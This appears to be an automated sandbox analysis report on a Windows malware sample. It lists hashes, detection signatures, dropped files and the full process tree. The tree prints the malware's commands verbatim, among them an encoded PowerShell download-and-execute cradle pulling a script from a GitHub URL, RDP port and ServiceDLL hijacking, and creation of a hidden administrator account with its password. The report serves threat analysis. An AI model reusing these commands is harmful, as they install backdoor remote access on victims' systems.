Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    01-10-2021 09:04

General

  • Target

    c1e0df4f2321e9375baee3a0a26fba64.exe

  • Size

    5.7MB

  • MD5

    c1e0df4f2321e9375baee3a0a26fba64

  • SHA1

    dcf4d90d2f3fd11f14b5413be5b7dde70ff33f7c

  • SHA256

    65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e

  • SHA512

    4bc74603d8a7a28a0c965cb78d7762c01312cdb6ee7d8be8f822ebb6bf3dbd273ac76c3ad5d0c70f9fa9439981c19a9bed4525f445d7faddb93e9db5a66a0ad7

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c1e0df4f2321e9375baee3a0a26fba64.exe
    "C:\Users\Admin\AppData\Local\Temp\c1e0df4f2321e9375baee3a0a26fba64.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2160
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4084
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dsdbzkag\dsdbzkag.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1200
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99A6.tmp" "c:\Users\Admin\AppData\Local\Temp\dsdbzkag\CSC4D15202A4BF94AC396D8EB7BDA1A338.TMP"
          4⤵
            PID:1048
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:640
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3808
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:852
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:4052
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:1076
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:680
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:584
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1048
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3800
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1500
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1528
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:3916
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4008
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2188
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2480
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:2928
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:3800
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:3892
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user WgaUtilAcc 000000 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1356
                    • C:\Windows\system32\net.exe
                      net.exe user WgaUtilAcc 000000 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3856
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                        3⤵
                          PID:1008
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user WgaUtilAcc EvL1Qs26 /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2860
                      • C:\Windows\system32\net.exe
                        net.exe user WgaUtilAcc EvL1Qs26 /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3404
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user WgaUtilAcc EvL1Qs26 /add
                          3⤵
                            PID:3784
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3144
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:680
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                            3⤵
                              PID:896
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3888
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3440
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                              3⤵
                                PID:1500
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2868
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3116
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                3⤵
                                  PID:1576
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user WgaUtilAcc EvL1Qs26
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3328
                              • C:\Windows\system32\net.exe
                                net.exe user WgaUtilAcc EvL1Qs26
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1940
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user WgaUtilAcc EvL1Qs26
                                  3⤵
                                    PID:4040
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2860
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  2⤵
                                    PID:416
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C wmic CPU get NAME
                                  1⤵
                                    PID:2448
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic CPU get NAME
                                      2⤵
                                        PID:3892
                                    • C:\Windows\System32\cmd.exe
                                      cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                      1⤵
                                        PID:1368
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                          2⤵
                                            PID:856
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                              3⤵
                                              • Blocklisted process makes network request
                                              • Drops file in Program Files directory
                                              • Drops file in Windows directory
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:3296

                                        Network

                                        MITRE ATT&CK Enterprise v6

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Temp\RES99A6.tmp

                                          MD5

                                          77ca1fdf0b80183aa10c2392504ea712

                                          SHA1

                                          b8736e5fffe6a345d4bd8485c394a277161b4cd8

                                          SHA256

                                          4284c100ac859aebb426b9ba9ee19251319b32288d8fda1c2aef39e6fbe160f3

                                          SHA512

                                          0d572d8bf0f805a8ef3079bf30e65563284f0a835b70a080abb879751bc9358e26ca8f91e69f349e68a939bb8355f4b34dbd433608bdf226e5b7c02864f3e6ad

                                        • C:\Users\Admin\AppData\Local\Temp\dsdbzkag\dsdbzkag.dll

                                          MD5

                                          108b2217c8bfea8edda37a67a1bc210b

                                          SHA1

                                          9de027473364862e6f652296aeb3a5957f5bc09d

                                          SHA256

                                          fc1effb81ed4ab61518e65ec28c244cf8a44ee874fba42eb1c436e91c2cd8b75

                                          SHA512

                                          0bbdc65a660628e3d74930ba4de01e9dc9ace907e2fb63413e6d775ace05d9e59231046670128e00c077fe48b4fc63b71b10a5929cca67ce3d2a3a64df648f1b

                                        • C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

                                          MD5

                                          09943fef6e44c022be35da249d514723

                                          SHA1

                                          bbb0cb31ab3cc5cdf80cea91dc15a6fdf127a0f9

                                          SHA256

                                          d3fb75a7ea8a822d7ce99ae06caaf1182860ddc321142494e45d7a071193e953

                                          SHA512

                                          1b4ee7254f56f39b605f10c2573054f4b7256ebd512a5943acb41c23558380443cd594d11e3ba7583a7f45d401d1b684f8c94febe3567ab903724f04e01dff9f

                                        • C:\Users\Admin\AppData\Local\Temp\ready.ps1

                                          MD5

                                          28d9755addec05c0b24cca50dfe3a92b

                                          SHA1

                                          7d3156f11c7a7fb60d29809caf93101de2681aa3

                                          SHA256

                                          abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

                                          SHA512

                                          891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

                                        • \??\c:\Users\Admin\AppData\Local\Temp\dsdbzkag\CSC4D15202A4BF94AC396D8EB7BDA1A338.TMP

                                          MD5

                                          9197e0da8f9b4eaec3ca79a59112ec20

                                          SHA1

                                          649061f21834615d27fd4035a18900bf998f10f1

                                          SHA256

                                          0ccdae698fa314590e9810f99b4b78e2c2a69c37d8e94aacbf042a25fa2ee954

                                          SHA512

                                          971abb27866652257def89f1e145c8690e2e9e8783d075f465dd84de372322be0e8d0ee82068ecbab76f99abedd985dd8e2fe89c35f0295c257c5789afdb179d

                                        • \??\c:\Users\Admin\AppData\Local\Temp\dsdbzkag\dsdbzkag.0.cs

                                          MD5

                                          9f8ab7eb0ab21443a2fe06dab341510e

                                          SHA1

                                          2b88b3116a79e48bab7114e18c9b9674e8a52165

                                          SHA256

                                          e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

                                          SHA512

                                          53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

                                        • \??\c:\Users\Admin\AppData\Local\Temp\dsdbzkag\dsdbzkag.cmdline

                                          MD5

                                          04a112234186cbcf6d97abbd469a5ee5

                                          SHA1

                                          e6cef62ce68b341458fb27cc24299fde66ab49d6

                                          SHA256

                                          1c7a640ea61ee8fbede6407a9f5be4357942feabc34fccc695b7713813258d6e

                                          SHA512

                                          9178c92b7847fc795c8a4efd077e5b63707e2fda2fb8465d90144dea498e2d1dc6991a4babacbcecb6ba745ec96da4b2658cd2f60af83934a96ca7a86693c212

                                        • \Windows\Branding\mediasrv.png

                                          MD5

                                          b98428c062b0eab6e519248af60ba869

                                          SHA1

                                          429e8a43e6bdcec95e381e63ebacf32b461ffa0c

                                          SHA256

                                          119ca0528bef4b1ee7e16683ed3a0705648fea93379903f254ef4ef735db8193

                                          SHA512

                                          43098defabf2ea8d052de9a69a2a1f92ec4b4cf73c89447c8f5dac85190d7489498cc6f8b32865fb322ae1f2ab05c3f8e51905fd97b446e9e81bfbf1b089c43a

                                        • \Windows\Branding\mediasvc.png

                                          MD5

                                          d9cbd823509feefe440aa85a009a5a7c

                                          SHA1

                                          430faab3ded95b6b494acee0739937acac80d8ce

                                          SHA256

                                          b94301a42868f776f5b05abdbd76fc5f13e9cf4576eb48328adddb08e8b2872a

                                          SHA512

                                          40ef5d5e6a4969478ca295a39659b16d618b7fd049d29780b9d05393e266a60d0725641004d896118c1af20b7f2a58ee3bb696c6b672a536acb071b4a09228ae

                                        • memory/416-367-0x0000000000000000-mapping.dmp

                                        • memory/584-341-0x0000000000000000-mapping.dmp

                                        • memory/640-191-0x000001D87C486000-0x000001D87C488000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/640-172-0x000001D87C483000-0x000001D87C485000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/640-214-0x000001D87C488000-0x000001D87C48A000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/640-171-0x000001D87C480000-0x000001D87C482000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/640-161-0x0000000000000000-mapping.dmp

                                        • memory/680-304-0x0000000000000000-mapping.dmp

                                        • memory/680-359-0x0000000000000000-mapping.dmp

                                        • memory/852-292-0x0000012F55678000-0x0000012F5567A000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/852-291-0x0000012F55676000-0x0000012F55678000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/852-259-0x0000012F55673000-0x0000012F55675000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/852-258-0x0000012F55670000-0x0000012F55672000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/852-244-0x0000000000000000-mapping.dmp

                                        • memory/856-369-0x0000000000000000-mapping.dmp

                                        • memory/896-360-0x0000000000000000-mapping.dmp

                                        • memory/1008-356-0x0000000000000000-mapping.dmp

                                        • memory/1048-142-0x0000000000000000-mapping.dmp

                                        • memory/1048-342-0x0000000000000000-mapping.dmp

                                        • memory/1076-303-0x0000000000000000-mapping.dmp

                                        • memory/1200-138-0x0000000000000000-mapping.dmp

                                        • memory/1500-346-0x0000000000000000-mapping.dmp

                                        • memory/1500-362-0x0000000000000000-mapping.dmp

                                        • memory/1528-347-0x0000000000000000-mapping.dmp

                                        • memory/1576-364-0x0000000000000000-mapping.dmp

                                        • memory/1940-365-0x0000000000000000-mapping.dmp

                                        • memory/2160-119-0x0000026AD08A5000-0x0000026AD08A6000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/2160-118-0x0000026AD08A3000-0x0000026AD08A5000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/2160-115-0x0000026AD08A0000-0x0000026AD08A2000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/2160-116-0x0000026AE95D0000-0x0000026AE99CF000-memory.dmp

                                          Filesize

                                          4.0MB

                                        • memory/2160-120-0x0000026AD08A6000-0x0000026AD08A7000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/2188-350-0x0000000000000000-mapping.dmp

                                        • memory/2480-351-0x0000000000000000-mapping.dmp

                                        • memory/2928-352-0x0000000000000000-mapping.dmp

                                        • memory/3116-363-0x0000000000000000-mapping.dmp

                                        • memory/3296-437-0x0000025763478000-0x0000025763479000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/3296-386-0x0000025763476000-0x0000025763478000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3296-383-0x0000025763473000-0x0000025763475000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3296-382-0x0000025763470000-0x0000025763472000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3296-370-0x0000000000000000-mapping.dmp

                                        • memory/3404-357-0x0000000000000000-mapping.dmp

                                        • memory/3440-361-0x0000000000000000-mapping.dmp

                                        • memory/3784-358-0x0000000000000000-mapping.dmp

                                        • memory/3800-450-0x0000000000000000-mapping.dmp

                                        • memory/3800-345-0x0000000000000000-mapping.dmp

                                        • memory/3808-216-0x0000022F1B273000-0x0000022F1B275000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3808-215-0x0000022F1B270000-0x0000022F1B272000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3808-201-0x0000000000000000-mapping.dmp

                                        • memory/3808-239-0x0000022F1B276000-0x0000022F1B278000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3808-257-0x0000022F1B278000-0x0000022F1B27A000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3856-355-0x0000000000000000-mapping.dmp

                                        • memory/3892-368-0x0000000000000000-mapping.dmp

                                        • memory/3892-451-0x0000000000000000-mapping.dmp

                                        • memory/3916-348-0x0000000000000000-mapping.dmp

                                        • memory/4008-349-0x0000000000000000-mapping.dmp

                                        • memory/4040-366-0x0000000000000000-mapping.dmp

                                        • memory/4052-302-0x0000000000000000-mapping.dmp

                                        • memory/4084-126-0x000001C038700000-0x000001C038702000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/4084-153-0x000001C039A70000-0x000001C039A71000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/4084-160-0x000001C038708000-0x000001C038709000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/4084-152-0x000001C0396E0000-0x000001C0396E1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/4084-141-0x000001C038706000-0x000001C038708000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/4084-146-0x000001C0386F0000-0x000001C0386F1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/4084-132-0x000001C0391D0000-0x000001C0391D1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/4084-127-0x000001C038703000-0x000001C038705000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/4084-121-0x0000000000000000-mapping.dmp

                                        • memory/4084-128-0x000001C0386C0000-0x000001C0386C1000-memory.dmp

                                          Filesize

                                          4KB